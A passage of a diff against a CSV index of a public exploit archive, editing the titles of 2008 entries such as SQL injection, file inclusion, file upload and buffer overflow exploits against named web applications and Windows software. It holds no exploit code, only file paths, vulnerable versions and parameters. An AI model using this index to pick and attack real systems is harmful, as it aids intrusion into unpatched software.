Multiple Remote SQL Injection Vulnerabilities Exploit",2008-05-11,Lidloses_Auge,php,webapps,0 +5587,platforms/php/webapps/5587.pl,"Joomla Component xsstream-dm 0.01b SQL Injection Exploit",2008-05-11,Houssamix,php,webapps,0 +5588,platforms/php/webapps/5588.php,"QuickUpCMS - Multiple SQL Injection Vulnerabilities Exploit",2008-05-11,Lidloses_Auge,php,webapps,0 5589,platforms/php/webapps/5589.php,"Vortex CMS (index.php pageid) Blind SQL Injection Exploit",2008-05-11,Lidloses_Auge,php,webapps,0 -5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - (featured_article.php) Remote SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 -5591,platforms/php/webapps/5591.txt,"AJ Auction <= 6.2.1 - (classifide_ad.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 -5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - (index.php) Remote SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 -5594,platforms/php/webapps/5594.txt,"ZeusCart <= 2.0 - (category_list.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 +5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - (featured_article.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 +5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - (classifide_ad.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 +5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - (index.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 +5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - (category_list.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection/XSS) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 5596,platforms/php/webapps/5596.txt,"BIGACE 2.4 - Multiple Remote File Inclusion Vulnerabilities",2008-05-12,BiNgZa,php,webapps,0 -5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script <= 1.5.x - Remote SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 -5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) Remote SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0 -5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script <= 05122008 SQL Injection Vulnerabilities",2008-05-12,InjEctOr5,php,webapps,0 -5600,platforms/php/webapps/5600.php,"CMS Made Simple <= 1.2.4 - (FileManager module) File Upload Exploit",2008-05-12,EgiX,php,webapps,0 -5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - Remote SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 -5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME (topic_detail.php id) Remote SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 +5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 +5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0 +5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 SQL Injection Vulnerabilities",2008-05-12,InjEctOr5,php,webapps,0 +5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) File Upload Exploit",2008-05-12,EgiX,php,webapps,0 +5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 +5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME (topic_detail.php id) SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 5603,platforms/php/webapps/5603.txt,"EQDKP 1.3.2f (user_id) Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0 5604,platforms/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection",2008-05-13,Saime,php,webapps,0 5605,platforms/php/webapps/5605.txt,"e-107 Plugin zogo-shop 1.16 Beta 13 SQL Injection",2008-05-13,Cr@zy_King,php,webapps,0 5606,platforms/php/webapps/5606.txt,"Web Group Communication Center (WGCC) <= 1.0.3 - SQL Injection",2008-05-13,myvx,php,webapps,0 -5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - (langsel) Remote SQL Injection",2008-05-13,His0k4,php,webapps,0 -5608,platforms/asp/webapps/5608.txt,"Meto Forum 1.1 - Multiple Remote SQL Injection Vulnerabilities",2008-05-13,U238,asp,webapps,0 +5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - (langsel) SQL Injection",2008-05-13,His0k4,php,webapps,0 +5608,platforms/asp/webapps/5608.txt,"Meto Forum 1.1 - Multiple SQL Injection Vulnerabilities",2008-05-13,U238,asp,webapps,0 5609,platforms/php/webapps/5609.txt,"EMO Realty Manager (news.php ida) SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 5610,platforms/php/webapps/5610.txt,"The Real Estate Script (dpage.php docID) SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 -5611,platforms/php/webapps/5611.txt,"Linkspile (link.php cat_id) Remote SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 +5611,platforms/php/webapps/5611.txt,"Linkspile (link.php cat_id) SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 5612,platforms/windows/remote/5612.html,"idautomation bar code ActiveX - Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0 5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 - (browseproject.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 - (detail.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 -5616,platforms/php/webapps/5616.txt,"ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0 +5616,platforms/php/webapps/5616.txt,"ActiveKB 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0 5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 -5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 - (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0 +5618,platforms/php/webapps/5618.txt,"La-Nai CMS 1.2.16 - (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0 -5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 - (RFIi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 -5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) RFI",2008-05-14,HaCkeR_EgY,php,webapps,0 +5620,platforms/php/webapps/5620.txt,"rgboard 3.0.12 - (RFIi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 +5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps,0 5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (RFI/rfd/SQL/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0 5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 - (category.php cat) SQL Injection",2008-05-15,HaCkeR_EgY,php,webapps,0 -5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System <= 2.0 - Arbitrary Add-Admin Exploit",2008-05-15,t0pP8uZz,php,webapps,0 +5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System 2.0 - Arbitrary Add-Admin Exploit",2008-05-15,t0pP8uZz,php,webapps,0 5628,platforms/php/webapps/5628.txt,"RantX 1.0 Insecure Admin Authentication",2008-05-15,t0pP8uZz,php,webapps,0 -5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0 +5629,platforms/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps,0 -5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0 +5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0 5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22 -5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0 -5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 - (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0 +5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0 +5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0 -5636,platforms/php/webapps/5636.txt,"Zomplog <= 3.8.2 - (force_download.php) File Disclosure",2008-05-16,Stack,php,webapps,0 +5636,platforms/php/webapps/5636.txt,"Zomplog 3.8.2 - (force_download.php) File Disclosure",2008-05-16,Stack,php,webapps,0 5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - (msnum) Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0 -5638,platforms/php/webapps/5638.txt,"How2ASP.net Webboard <= 4.1 - Remote SQL Injection",2008-05-17,"CWH Underground",php,webapps,0 +5638,platforms/php/webapps/5638.txt,"How2ASP.net Webboard 4.1 - SQL Injection",2008-05-17,"CWH Underground",php,webapps,0 5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - (category) Remote Blind SQL Injection Exploit",2008-05-17,His0k4,php,webapps,0 5640,platforms/php/webapps/5640.py,"Smeego 1.0 - (Cookie lang) Local File Inclusion Exploit",2008-05-17,0in,php,webapps,0 -5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities",2008-05-18,dun,php,webapps,0 -5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS - Multiple Remote SQL Injection Vulnerabilities",2008-05-18,dun,php,webapps,0 +5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro Multiple SQL Injection Vulnerabilities",2008-05-18,dun,php,webapps,0 +5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS - Multiple SQL Injection Vulnerabilities",2008-05-18,dun,php,webapps,0 5643,platforms/php/webapps/5643.txt,"Ajax framework (lang) Local File Inclusion",2008-05-18,dun,php,webapps,0 5644,platforms/php/webapps/5644.txt,"lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0 -5645,platforms/php/webapps/5645.txt,"AlkalinePHP <= 0.77.35 - (adduser.php) Arbitrary Add-Admin",2008-05-18,t0pP8uZz,php,webapps,0 -5646,platforms/php/webapps/5646.txt,"easycms <= 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0 -5647,platforms/php/webapps/5647.txt,"GNU/Gallery <= 1.1.1.0 - (admin.php) Local File Inclusion",2008-05-18,t0pP8uZz,php,webapps,0 -5648,platforms/php/webapps/5648.pl,"MeltingIce File System <= 1.0 - Remote Arbitrary Add-User Exploit",2008-05-18,t0pP8uZz,php,webapps,0 -5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System <= 1.1a Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 +5645,platforms/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add-Admin",2008-05-18,t0pP8uZz,php,webapps,0 +5646,platforms/php/webapps/5646.txt,"easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0 +5647,platforms/php/webapps/5647.txt,"GNU/Gallery 1.1.1.0 - (admin.php) Local File Inclusion",2008-05-18,t0pP8uZz,php,webapps,0 +5648,platforms/php/webapps/5648.pl,"MeltingIce File System 1.0 - Remote Arbitrary Add-User Exploit",2008-05-18,t0pP8uZz,php,webapps,0 +5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System 1.1a Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 -5651,platforms/php/webapps/5651.txt,"microssys CMS <= 1.5 - Remote File Inclusion",2008-05-19,Raz0r,php,webapps,0 -5652,platforms/php/webapps/5652.pl,"AlkalinePHP <= 0.80.00 beta (thread.php id) SQL Injection Exploit",2008-05-19,Stack,php,webapps,0 -5653,platforms/php/webapps/5653.php,"MercuryBoard <= 1.1.5 - (login.php) Remote Blind SQL Injection Exploit",2008-05-19,EgiX,php,webapps,0 -5654,platforms/php/webapps/5654.txt,"EntertainmentScript (play.php id) Remote SQL Injection",2008-05-19,Mr.SQL,php,webapps,0 +5651,platforms/php/webapps/5651.txt,"microssys CMS 1.5 - Remote File Inclusion",2008-05-19,Raz0r,php,webapps,0 +5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 beta (thread.php id) SQL Injection Exploit",2008-05-19,Stack,php,webapps,0 +5653,platforms/php/webapps/5653.php,"MercuryBoard 1.1.5 - (login.php) Remote Blind SQL Injection Exploit",2008-05-19,EgiX,php,webapps,0 +5654,platforms/php/webapps/5654.txt,"EntertainmentScript (play.php id) SQL Injection",2008-05-19,Mr.SQL,php,webapps,0 5655,platforms/php/webapps/5655.pl,"EntertainmentScript 1.4.0 - (page.php page) Local File Inclusion Exploit",2008-05-20,Stack,php,webapps,0 5656,platforms/php/webapps/5656.txt,"ecms 0.4.2 - (SQL/pb) Multiple Vulnerabilities",2008-05-20,"Virangar Security",php,webapps,0 5657,platforms/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 - (CE/XSS/CSRF) Multiple Vulnerabilities",2008-05-20,USH,php,webapps,0 -5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 - (index.php comic_id) Remote SQL Injection",2008-05-20,Niiub,php,webapps,0 -5659,platforms/php/webapps/5659.txt,"MX-System 2.7.3 - (index.php page) Remote SQL Injection",2008-05-20,cOndemned,php,webapps,0 -5660,platforms/php/webapps/5660.txt,"Php Jokesite 2.0 - (cat_id) Remote SQL Injection",2008-05-20,InjEctOr5,php,webapps,0 +5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 - (index.php comic_id) SQL Injection",2008-05-20,Niiub,php,webapps,0 +5659,platforms/php/webapps/5659.txt,"MX-System 2.7.3 - (index.php page) SQL Injection",2008-05-20,cOndemned,php,webapps,0 +5660,platforms/php/webapps/5660.txt,"Php Jokesite 2.0 - (cat_id) SQL Injection",2008-05-20,InjEctOr5,php,webapps,0 5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 - (index.php pageid) SQL Injection",2008-05-21,InjEctOr5,php,webapps,0 5662,platforms/cgi/webapps/5662.txt,"Alcatel OmniPCX Office 210/061.1 - Remote Command Execution",2008-05-21,DSecRG,cgi,webapps,0 -5663,platforms/php/webapps/5663.txt,"6rbScript - (news.php newsid) Remote SQL Injection",2008-05-21,"Hussin X",php,webapps,0 -5664,platforms/php/webapps/5664.txt,"webl?sninger <= 4 - (XSS/SQL) Multiple Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 -5665,platforms/php/webapps/5665.txt,"Netbutikker <= 4 - Remote SQL Injection Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 +5663,platforms/php/webapps/5663.txt,"6rbScript - (news.php newsid) SQL Injection",2008-05-21,"Hussin X",php,webapps,0 +5664,platforms/php/webapps/5664.txt,"webl?sninger 4 - (XSS/SQL) Multiple Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 +5665,platforms/php/webapps/5665.txt,"Netbutikker 4 - SQL Injection Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - (uid) Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0 5667,platforms/windows/local/5667.py,"VLC 0.8.6d SSA Parsing Double Sh311 - Universal Exploit",2008-05-23,j0rgan,windows,local,0 5668,platforms/php/webapps/5668.txt,"quate CMS 0.3.4 - (RFI/LFI/XSS/dt) Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0 5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - (install_mod.php) Local File Inclusion",2008-05-23,DSecRG,php,webapps,0 -5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - (idresa) Remote SQL Injection",2008-05-24,His0k4,php,webapps,0 -5671,platforms/php/webapps/5671.txt,"phpRaider 1.0.7 - (phpbb3.functions.php) RFI",2008-05-24,Kacak,php,webapps,0 +5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - (idresa) SQL Injection",2008-05-24,His0k4,php,webapps,0 +5671,platforms/php/webapps/5671.txt,"phpRaider 1.0.7 - (phpbb3.functions.php) Remote File Inclusion",2008-05-24,Kacak,php,webapps,0 5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0 -5673,platforms/php/webapps/5673.txt,"Xomol CMS <= 1.2 Login Bypass / LFI Vulnerabilities",2008-05-25,DNX,php,webapps,0 +5673,platforms/php/webapps/5673.txt,"Xomol CMS 1.2 Login Bypass / LFI Vulnerabilities",2008-05-25,DNX,php,webapps,0 5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin User",2008-05-26,Stack,php,webapps,0 -5675,platforms/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple Remote SQL Injection Vulnerabilities",2008-05-26,"Virangar Security",php,webapps,0 -5676,platforms/php/webapps/5676.txt,"CMS MAXSITE <= 1.10 - (category) Remote SQL Injection",2008-05-26,Tesz,php,webapps,0 -5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - (search) Remote SQL Injection",2008-05-27,The:Paradox,php,webapps,0 +5675,platforms/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injection Vulnerabilities",2008-05-26,"Virangar Security",php,webapps,0 +5676,platforms/php/webapps/5676.txt,"CMS MAXSITE 1.10 - (category) SQL Injection",2008-05-26,Tesz,php,webapps,0 +5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - (search) SQL Injection",2008-05-27,The:Paradox,php,webapps,0 5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - (category_id) SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - sleep() Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0 5680,platforms/php/webapps/5680.txt,"OtomiGen.X 2.2 - (lang) Local File Inclusion Vulnerabilities",2008-05-27,Saime,php,webapps,0 5681,platforms/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow Exploit",2008-05-27,BitKrush,windows,remote,0 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 SaveToFile()File Corruption PoC",2008-05-28,Nine:Situations:Group,windows,dos,0 -5683,platforms/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple Remote SQL Injection Vulnerabilities",2008-05-28,cOndemned,php,webapps,0 +5683,platforms/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple SQL Injection Vulnerabilities",2008-05-28,cOndemned,php,webapps,0 5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0 -5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) Remote SQL Injection",2008-05-28,HER0,php,webapps,0 -5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0 -5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 -5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - (pid) Remote SQL Injection",2008-05-29,QTRinux,php,webapps,0 +5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) SQL Injection",2008-05-28,HER0,php,webapps,0 +5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0 +5688,platforms/php/webapps/5688.php,"SyntaxCMS 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 +5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - (pid) SQL Injection",2008-05-29,QTRinux,php,webapps,0 5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (Windows)",2008-05-29,gmda,php,webapps,0 -5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0 -5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection",2008-05-29,Houssamix,php,webapps,0 -5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 - (image.php) Directory Traversal",2008-05-29,Stack,php,webapps,0 +5691,platforms/php/webapps/5691.php,"CMS from Scratch 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0 +5692,platforms/php/webapps/5692.pl,"Mambo Component mambads 1.0 RC1 Beta SQL Injection",2008-05-29,Houssamix,php,webapps,0 +5693,platforms/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - (image.php) Directory Traversal",2008-05-29,Stack,php,webapps,0 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800 -5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d - Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0 +5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d - SQL Injection Exploit",2008-05-29,Stack,php,webapps,0 5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 -5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 - (cid) SQL Injection",2008-05-30,K-159,php,webapps,0 -5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0 +5698,platforms/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - (cid) SQL Injection",2008-05-30,K-159,php,webapps,0 +5699,platforms/php/webapps/5699.txt,"PsychoStats 2.3.3 - Multiple SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0 5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0 -5701,platforms/php/webapps/5701.txt,"Social Site Generator (sgc_id) Remote SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps,0 +5701,platforms/php/webapps/5701.txt,"Social Site Generator (sgc_id) SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps,0 5702,platforms/php/webapps/5702.txt,"Azuresites CMS - Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0 -5703,platforms/php/webapps/5703.txt,"PHP Visit Counter <= 0.4 - (datespan) SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 -5704,platforms/php/webapps/5704.txt,"PassWiki <= 0.9.16 RC3 - (site_id) Local File Inclusion",2008-05-31,mozi,php,webapps,0 +5703,platforms/php/webapps/5703.txt,"PHP Visit Counter 0.4 - (datespan) SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 +5704,platforms/php/webapps/5704.txt,"PassWiki 0.9.16 RC3 - (site_id) Local File Inclusion",2008-05-31,mozi,php,webapps,0 5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 - (id) Remote Blind SQL Injection",2008-05-31,JosS,asp,webapps,0 -5706,platforms/php/webapps/5706.php,"EasyWay CMS (index.php mid) Remote SQL Injection Exploit",2008-05-31,Lidloses_Auge,php,webapps,0 +5706,platforms/php/webapps/5706.php,"EasyWay CMS (index.php mid) SQL Injection Exploit",2008-05-31,Lidloses_Auge,php,webapps,0 5707,platforms/php/webapps/5707.txt,"Social Site Generator (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0 -5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter <= 1.4.9 - (id) SQL Injection",2008-05-31,His0k4,php,webapps,0 +5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter 1.4.9 - (id) SQL Injection",2008-05-31,His0k4,php,webapps,0 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Auth)",2008-05-31,securfrog,windows,dos,0 5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 - (id) SQL Injection Exploit",2008-05-31,Stack,php,webapps,0 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0 @@ -5341,73 +5341,73 @@ id,file,description,date,author,platform,type,port 5714,platforms/php/webapps/5714.pl,"Joomla Component com_mycontent 1.1.13 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion Vulnerabilities",2008-06-01,MK,php,webapps,0 5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL/upload/XSS) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0 -5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection",2008-06-01,KnocKout,asp,webapps,0 +5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta SQL Injection",2008-06-01,KnocKout,asp,webapps,0 5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 - (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0 5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0 5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 -5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x - BlindSQL Injection Exploit",2008-06-02,His0k4,php,webapps,0 +5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp 0.12.x - BlindSQL Injection Exploit",2008-06-02,His0k4,php,webapps,0 5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0 -5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL Injection",2008-06-02,His0k4,php,webapps,0 -5724,platforms/php/webapps/5724.txt,"pLog (albumId) Remote SQL Injection",2008-06-02,DreamTurk,php,webapps,0 +5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,php,webapps,0 +5724,platforms/php/webapps/5724.txt,"pLog (albumId) SQL Injection",2008-06-02,DreamTurk,php,webapps,0 5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - (SQL/XSS) Multiple Vulnerabilities",2008-06-02,"CWH Underground",php,webapps,0 -5727,platforms/windows/dos/5727.pl,"MDaemon <= 9.6.5 - Multiple Remote Buffer Overflow Exploit PoC",2008-06-02,securfrog,windows,dos,0 